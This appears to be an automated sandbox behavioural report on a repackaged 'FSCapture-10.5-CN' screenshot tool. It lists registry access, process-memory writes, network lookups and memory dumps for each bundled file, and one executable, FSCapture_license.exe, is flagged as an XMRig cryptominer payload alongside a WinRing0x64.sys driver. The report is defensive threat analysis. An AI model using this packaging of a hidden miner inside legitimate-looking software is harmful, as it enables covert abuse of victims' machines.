Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2680 wrote to memory of 2932 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCIcon.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

memory/396-0-0x0000000001980000-0x0000000001981000-memory.dmp

memory/396-1-0x0000000000D40000-0x0000000000F76000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp

Files

memory/1516-0-0x0000000002C10000-0x0000000002C11000-memory.dmp

memory/1516-1-0x0000000006C80000-0x0000000006C9E000-memory.dmp

memory/1516-4-0x0000000002C10000-0x0000000002C11000-memory.dmp

memory/1516-3-0x0000000000640000-0x0000000000D4F000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

152s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\FilterData = 02000000000020000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000006175647300001000800000aa00389b7100000000000000000000000000000000 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\ = "FastStoneVirtualAudio" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\CLSID = "{7D24573C-DB27-3694-BEC3-4263D335A781}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FSCapture-10.5-CN\\bin\\FSCPlugin05.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{33D9A762-90C8-11d0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\FriendlyName = "FastStoneVirtualAudio" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 1960 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4048 wrote to memory of 1960 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4048 wrote to memory of 1960 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20241010-en

Max time kernel

119s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 224

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

138s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\FSCapture_license.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/5028-0-0x0000000002E30000-0x0000000002E50000-memory.dmp

memory/5028-1-0x0000000000400000-0x0000000000E80000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

120s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 248

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin02.exe"

Network

N/A

Files

memory/2232-0-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/2232-1-0x0000000000810000-0x0000000000BA7000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCrossHair.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 74.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp

Files

memory/4004-0-0x0000000002460000-0x0000000002461000-memory.dmp

memory/4004-1-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

117s

Max time network

119s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

Network

N/A

Files

memory/2192-0-0x0000000000010000-0x0000000000017000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

156s

Command Line

"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\423Down.url

Signatures

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4824 wrote to memory of 860 N/A C:\Windows\System32\rundll32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4824 wrote to memory of 860 N/A C:\Windows\System32\rundll32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 2856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 2856 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 860 wrote to memory of 4652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
